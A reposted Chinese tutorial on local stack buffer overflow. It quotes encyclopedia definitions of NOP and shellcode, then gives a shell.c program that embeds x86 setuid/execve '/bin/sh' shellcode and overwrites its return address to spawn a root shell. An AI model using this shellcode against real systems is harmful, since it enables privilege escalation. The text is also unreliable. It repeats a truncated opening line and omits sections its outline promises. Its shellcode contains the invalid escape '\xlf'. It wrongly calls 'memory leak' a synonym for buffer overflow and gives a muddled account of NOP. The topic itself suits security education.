Info:本篇主要是为了验证本地缓冲区溢出，这是理解缓冲区溢

Info:本篇主要是为了验证本地缓冲区溢出，这是理解缓冲区溢出攻击的第一步，有了这一步，才能更深刻的理解到什么是缓冲区漏洞攻击，从而对以后的学习奠定一定的基础（注意：以下请在linux环境下实验）

基本概念

NOP

shellcode

验证1：shell.c文件实现漏洞攻击

验证2：在命令行上进行栈溢出漏洞攻击

总结

缓冲区溢出漏洞产生的原因主要是使用不安全的函数或者是没有检测用户输入的长度所造成的，缓冲区溢出攻击是利用缓冲区溢出漏洞所进行的攻击行动。缓冲区溢出是一种非常普遍、非常危险的漏洞，在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击，可以导致程序运行失败、系统关机、重新启动等后果。当造成溢出时，超出空间的数据将会被覆盖到正常的数据块上，这样就会造成数据混乱，可以利用它执行非授权指令，甚至可以取得系统特权，进而进行各种非法操作。缓冲区溢出攻击有多种英文名称：buffer overflow，buffer overrun，smash the stack，trash the stack，scribble the stack， mangle the stack， memory leak，overrun screw；它们指的都是同一种攻击手段。第一个缓冲区溢出攻击--Morris蠕虫，发生在二十年前，它曾造成了全世界6000多台网络服务器瘫痪。
在当前网络与分布式系统安全中，被广泛利用的50%以上都是缓冲区溢出，其中最著名的例子是1988年利用fingerd漏洞的蠕虫。而缓冲区溢出中，最为危险的是堆栈溢出，因为入侵者可以利用堆栈溢出，在函数返回时改变返回程序的地址，让其跳转到任意地址，带来的危害一种是程序崩溃导致拒绝服务，另外一种就是跳转并且执行一段恶意代码，比如得到shell，然后为所欲为。

——–百度百科

NOP命令（英语发音为“no-op”）意味着不执行任何的操作，EIP如何指向NOP处，那么他就会跳过中间件进入下一个函数

Shellcode实际是一段代码（也可以是填充数据），是用来发送到服务器利用特定漏洞的代码，一般可以获取权限。另外，Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心，提到它自然就会和漏洞联想在一起，毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shellcode，因此掌握Shellcode编写技术就显得尤为重要。

——–百度百科

//shell.c
char shellcode[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\xlf"
        "\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
        "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(){
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}

现在我们执行#./shell命令，你就会发现一个#号，出现一个#号就代码成功获取了根用户的shell提示符。一定程度上能防范缓冲区溢出攻击的措施有哪些

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-94771-1.html